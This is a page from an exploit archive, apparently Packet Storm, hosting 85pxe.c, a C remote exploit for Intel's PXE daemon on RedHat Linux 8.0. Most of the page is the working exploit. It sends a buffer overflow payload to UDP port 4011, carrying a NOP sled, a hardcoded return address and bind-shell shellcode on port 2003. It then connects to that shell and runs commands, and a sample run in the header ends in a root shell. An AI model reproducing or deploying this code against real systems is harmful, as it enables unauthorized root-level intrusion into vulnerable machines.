what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

85pxe.c

85pxe.c
Posted Mar 17, 2003
Authored by LByte, Crazy Einstein | Site lbyte.void.ru

Remote exploit for Intel's PXE (Pre-boot eXecution Environment) daemon on RedHat Linux 8.0.

tags | exploit, remote
systems | linux, redhat
SHA-256 | 6ee7f60bbf12228d58ccf17f6d93e028fed34300347b2f6d532b8eabc173c677

85pxe.c

Change Mirror Download
/*
\ ____________________
/ Black Sand Project
\ --------------------
/
\ !!! PRIVATE REMOTE PXE EXPLOIT !!!
/
\ Name: 85pxe.c
/
\ Target daemon: Intel PXE daemon, PXE-2.0 Beta-1 (build 001)
/
\ Created by CrZ [crazy_einstein@yahoo.com] LByte [lbyte.void.ru] /13.03.03/
/
\ Bug was discovered by n-arrow @efnet
/
\ !!! PRIVATE REMOTE PXE EXPLOIT !!!
/
\ Description: pxe is a daemon included in RedHat8.0 distr.
/ this daemon bind socket on 4011 udp port.
\
/ Important Note: pxe will crush if return address isn't valid.
\ So.. make sure that return address is valid :)
/
\ Tested against: RedHat 8.0 (Psyche)
/
\ Example of work:
/
\ [crz@blacksand tmp]$ ./85pxe -h blacksand -t 0
/
\ LimpidByte private remote pxe exploit by CrZ [crazy_einstein@yahoo.com]
/
\ [!] Connecting to blacksand:4011
/ [+] Connected!
\ [!] Using 0xbffff05c return address!
/ [>] Sending shellcode!
\ [*] Trying to connect to blacksand:2003 port!!! Pray for success!
/ [*] Sleeping at 2 seconds...
\ [!] Connected! Here comes the shell baby...x)
/
\ uid=0(root) gid=0(root)
/ Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
\ exit
/ [!] Connection closed.
\ [crz@blacksand tmp]$
/
\
*/

#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>

/* bind shell upon 2003 port */

char shell[] =
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
"\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

struct TARGETS {
char *distr;
long ret;
} targets[] = { {"RedHat 8.0 (Psyche)", 0xbffff05c} };


long getip(char *hostname) {
struct hostent *he;
long ipaddr;

if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
perror("gethostbyname()");
exit(-1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}

void usage(char *prog) {

int i=0;

printf("\nUsage: %s <-h www.victim.com> [-p port] [-t target] [-r manual_retaddr]\n\nTargets:\n",prog);
while(targets[i++].distr) printf("\t[%d] -> %s\n",i-1,targets[i-1].distr);
printf("\n");
exit(0);

}

int main(int argc, char **argv) {

int i=0;
struct sockaddr_in sockstruct;
struct hostent *HOST;
char tmp[10000];
int sock;
fd_set rset;
int port=4011,shellport=2003;
char *victim=NULL;
long ret=0,ret1,ret2,ret3;

printf("\nLimpidByte private remote pxe exploit by CrZ [crazy_einstein@yahoo.com]\n");

for(i=0;i<argc;i++) {
if(argv[i][1]=='h') victim=argv[i+1];
if(argv[i][1]=='p') port=atoi(argv[i+1]);
if(argv[i][1]=='t') ret=targets[atoi(argv[i+1])].ret;
if(argv[i][1]=='r') sscanf(argv[i+1],"0x%x",&ret);
}

if(!victim || ret==0) usage(argv[0]);

/* prepare for our smart trick :) */

ret1=ret+2;
ret2=ret+3;
ret3=ret;

sock=socket(PF_INET,SOCK_DGRAM,17);
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(victim);
sockstruct.sin_port=htons(port);

printf("\n[!] Connecting to %s:%d\n",victim,port);

if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {

printf("[+] Connected!\n",i);

/* the main trick */

bzero(tmp,sizeof tmp);
memcpy(tmp,&ret1,4);
memcpy(tmp+4,&ret2,4);
memset(tmp+8,0x90,894-8);
memcpy(tmp+894,&shell,sizeof shell);
memcpy(tmp+1024,&ret3,4);
printf("[!] Using 0x%x return address!\n",ret);
printf("[>] Sending shellcode!\n");
write(sock,tmp,1024 + 4);

}

close(sock);

printf("[*] Trying to connect to %s:%d port!!! Pray for success!\n",victim,shellport);
printf("[*] Sleeping at 2 seconds...\n");
sleep(2);

sock=socket(PF_INET,SOCK_STREAM,0);

bzero(sockstruct.sin_zero,sizeof(sockstruct.sin_zero));
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(victim);
sockstruct.sin_port=htons(shellport);

if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
printf("[!] Connected! Here comes the shell baby...x)\n\n");
write(sock, "id;uname -a\n", 12);
while (1) {
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock + 1, &rset, NULL, NULL, NULL);

if (FD_ISSET(sock, &rset)) {
i = read(sock, tmp, sizeof(tmp) - 1);
if (i <= 0) {
printf("[!] Connection closed.\n");
close(sock);
exit(0);
}
tmp[i] = 0;
printf("%s", tmp);
}
if (FD_ISSET(STDIN_FILENO, &rset)) {
i = read(STDIN_FILENO, tmp, sizeof(tmp) - 1);
if (i > 0) {
tmp[i]=0;
write(sock, tmp, i);
}
}
}
} else printf("[x] Bad luck x(\n\n");

close(sock);


return 0;
}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close